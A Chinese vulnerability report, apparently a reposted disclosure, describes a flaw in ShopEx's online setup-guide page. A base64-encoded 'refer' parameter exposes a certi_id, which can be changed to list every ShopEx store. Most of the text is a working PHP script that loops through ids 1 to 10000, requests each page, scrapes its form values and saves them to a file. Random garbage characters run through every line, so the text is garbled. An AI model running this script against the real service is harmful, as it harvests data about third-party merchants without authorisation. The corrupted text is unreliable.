|
|
简要描述:) i) e8 K, |( S
ShopEx某接口缺陷,可遍历所有网站" h+ M: {( J+ r. K7 R. b0 r
详细说明:
1 z% x8 o4 ~) ?问题出现在shopex 网店使用向导页面
8 S5 j7 v$ w+ W& I1 \4 _% x# y$ D4 P9 W- I
/ j( a$ H" Y8 Z) b+ E
, W m$ E" v7 ~1 {3 ?9 r
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
0 ]/ X2 r \9 v1 u% r! G7 Q7 f8 C2 f1 e& ]
6 u+ V1 _) S, T5 S7 g0 v k5 a$ F7 O. L" I; l4 w2 l
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
' e3 B, c. b6 M: R0 |% u Z
9 F5 @! x- X6 J( @" @/ x3 Y
# E" t* D2 c. E( [" K
' v, c1 h& n% Z* Z& X: P我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
) J7 k0 t1 R/ F: `" }' }2 M( V9 q8 U6 r, A- M
{1 q8 N: l/ y! ^( B5 E7 T
9 X$ A. W# ?6 T7 q8 X- f* H5 Y<?php
! P- Q S$ k$ G) K" ?. V% t: g" P! P+ ^& E, u
for ($i=1; $i < 10000; $i++) { //遍历- p+ W! Y; }5 r
$ k: X a c( Y% a
ShowshopExD($i);
5 U. t6 x8 h4 U) T! R5 P& n. [$ `7 u7 W2 Z# p+ J* [% E1 S' N* e
}3 b( S5 a) L4 ], `' F
+ w& b/ S8 k- h
function ShowshopExD($cid) {
3 m" S2 ~4 K, t! G0 W
' [' P: L0 a2 D' s/ _7 a6 [1 r $url='http://guide.ecos.shopex.cn/step2.php';
& F- W8 f; Y% V9 V4 ^
" L, v4 ^/ O) Q0 U' M $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
- x* H B0 q- o+ l1 x% X% C! ]
0 l2 ]0 D& W+ C; t. @ $url = $url.'?refer='.$refer;5 h% \9 n) {1 t9 b
; k, @% P5 Q- g5 \# Z
$ch = curl_init($url);
% a V. `6 |* L$ b ]
; l; d& _( D! R) M1 [5 B curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;+ h8 l. t M: [! t, o, H
8 k9 I" b X5 k" w, e2 X" q
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;+ A- E! x4 T( v; Y' \6 M( T7 R
* j; g* w$ d4 b; M0 z n: Y+ [
$result = curl_exec($ch);
5 ~4 z& @! p1 J0 Y9 Y9 ? g
) [* \7 W6 D+ _3 U $result = mb_convert_encoding($result, "gb2312", "UTF-8");* }! A8 b0 ?8 W
7 L) _! X7 d' ^ if(strpos($result,$refer))
: Q/ f8 D3 J* s& u
1 b2 E$ p* {$ o9 I- g1 A j3 L {3 B* Q0 L) W1 S/ E
3 I5 S# }2 B5 m' y L, t
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
4 Q8 T3 F" L E$ _9 Z( I. `4 Q& q" S" k
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);; G% |. S. W# [& C8 G. a7 b3 }
( d+ V1 A" k( w8 ]% b) [
foreach ($value[1] as $key) {# P# V, O/ T3 ~* D- |7 p. m
9 ~' s6 y. ^# v0 N1 ] preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);, y( Z" J6 a& Z
, s- |: s2 y& M9 a echo $res[1][0].':'.$res[3][0]."\r\n";
2 |/ L, `7 `# E# j6 S
! L0 }3 [3 G1 b# P0 f5 O $col =$res[1][0].':'.$res[3][0]."\r\n"; # S- c! B8 H* I) t
; I9 S2 c* ^( Q
fwrite($fp, $col, strlen($col)); & L- W) B \" c @
% l: g( I: _5 y5 p2 i2 h
}, \+ F8 w: t+ _+ _+ a
E0 ^0 _0 L# Y( L" i" u8 o9 J* T echo '--------------------------------'."\r\n";
, b9 x# [9 x; n P7 y- A5 F$ o1 ?: J% B' r2 i
fclose($fp);
0 ^2 Y+ Y* A9 L, O! o
/ G ?- a4 w( s: {) I }5 S, ]' ~* H+ r e: s
- w4 u" Q* F7 m( Y0 K
flush(); F4 c+ p! n* c, p! C6 J) H, B+ d) O/ T
% _( I" Z" u5 s M# I curl_close($ch);
8 \* C; }3 b0 J
; |9 y( u2 D X7 i0 F% ~ }
2 e H: {& w8 Q( a5 Y# ?* a4 n( N8 X# Y( L+ ?
?>2 R4 q3 f9 Q/ t; }! v
漏洞证明:4 p) R, m) |7 }3 ]# o
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg4 d9 p: L8 s7 P; n) r
refer换成其他加密方式
& v7 J- h3 E' i' F: N! { |
|